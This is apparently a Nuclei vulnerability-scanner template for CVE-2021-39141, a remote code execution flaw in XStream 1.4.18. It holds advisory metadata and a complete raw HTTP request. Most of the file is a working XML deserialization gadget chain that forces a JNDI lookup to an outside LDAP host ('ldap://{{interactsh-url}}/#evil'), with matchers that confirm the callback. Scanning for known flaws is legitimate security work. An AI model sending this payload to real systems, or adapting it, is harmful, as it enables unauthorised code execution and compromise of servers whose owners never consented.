id: CVE-2021-39141
info:
name: XStream 1.4.18 - Remote Code Execution
author: pwnhxl
severity: high
description: |
XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands on the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
remediation: |
Upgrade XStream to a version that is not affected by CVE-2021-39141.
reference:
- http://x-stream.github.io/CVE-2021-39141.html
- https://x-stream.github.io/CVE-2021-39141.html
- https://github.com/x-stream/xstream/security/advisories/GHSA-g5w6-mrj7-75h2
- https://security.netapp.com/advisory/ntap-20210923-0003/
- https://nvd.nist.gov/vuln/detail/CVE-2021-39141
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 8.5
cve-id: CVE-2021-39141
cwe-id: CWE-434
epss-score: 0.25418
epss-percentile: 0.96265
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: xstream_project
product: xstream
tags: cve,cve2021,xstream,deserialization,rce,xstream_project
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
<owner/>
<managedObjectManagerClosed>false</managedObjectManagerClosed>
<databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
<stubHandlers>
<entry>
<method>
<class>java.lang.Comparable</class>
<name>compareTo</name>
<parameter-types>
<class>java.lang.Object</class>
</parameter-types>
</method>
<com.sun.xml.internal.ws.client.sei.StubHandler>
<bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
<indices>
<int>0</int>
</indices>
<getters>
<com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
</getters>
<accessors>
<com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
<val_-isJAXBElement>false</val_-isJAXBElement>
<val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
<type>int</type>
<field>
<name>hash</name>
<clazz>java.lang.String</clazz>
</field>
</val_-getter>
<val_-isListType>false</val_-isListType>
<val_-n>
<namespaceURI/>
<localPart>hash</localPart>
<prefix/>
</val_-n>
<val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
<type>java.lang.String</type>
<method>
<class>javax.naming.InitialContext</class>
<name>doLookup</name>
<parameter-types>
<class>java.lang.String</class>
</parameter-types>
</method>
</val_-setter>
<outer-class>
<propertySetters>
<entry>
<string>serialPersistentFields</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>[Ljava.io.ObjectStreamField;</type>
<field>
<name>serialPersistentFields</name>
<clazz>java.lang.String</clazz>
</field>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
<entry>
<string>CASE_INSENSITIVE_ORDER</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>java.util.Comparator</type>
<field>
<name>CASE_INSENSITIVE_ORDER</name>
<clazz>java.lang.String</clazz>
</field>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
<entry>
<string>serialVersionUID</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>long</type>
<field>
<name>serialVersionUID</name>
<clazz>java.lang.String</clazz>
</field>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
<entry>
<string>value</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>[C</type>
<field>
<name>value</name>
<clazz>java.lang.String</clazz>
</field>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
<entry>
<string>hash</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>int</type>
<field reference='../../../../../val_-getter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
</propertySetters>
<propertyGetters>
<entry>
<string>serialPersistentFields</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter>
<type>[Ljava.io.ObjectStreamField;</type>
<field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldGetter>
</entry>
<entry>
<string>CASE_INSENSITIVE_ORDER</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter>
<type>java.util.Comparator</type>
<field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldGetter>
</entry>
<entry>
<string>serialVersionUID</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter>
<type>long</type>
<field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldGetter>
</entry>
<entry>
<string>value</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter>
<type>[C</type>
<field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldGetter>
</entry>
<entry>
<string>hash</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
</entry>
</propertyGetters>
<elementLocalNameCollision>false</elementLocalNameCollision>
<contentClass>java.lang.String</contentClass>
<elementDeclaredTypes/>
</outer-class>
</com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
</accessors>
<wrapper>java.lang.Object</wrapper>
<bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
<dynamicWrapper>false</dynamicWrapper>
</bodyBuilder>
<isOneWay>false</isOneWay>
</com.sun.xml.internal.ws.client.sei.StubHandler>
</entry>
</stubHandlers>
<clientConfig>false</clientConfig>
</databinding>
<methodHandlers>
<entry>
<method reference='../../../databinding/stubHandlers/entry/method'/>
<com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
<owner reference='../../../..'/>
<method reference='../../../../databinding/stubHandlers/entry/method'/>
<isVoid>false</isVoid>
<isOneway>false</isOneway>
</com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
</entry>
</methodHandlers>
</handler>
</dynamic-proxy>
<string>ldap://{{interactsh-url}}/#evil</string>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "timestamp"
- "com.thoughtworks.xstream"
condition: or
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 500
# digest: 4a0a00473045022100ee2804f5c77c03dfc26e9d12de292c8f7b478fcbad137042691fcdbc1ec33c380220406d482a8150b89f50d17d62b644ce6948fd37f18031f80c51d1c89fd5aa8e85:922c64590222798bb761d5b6d8e72950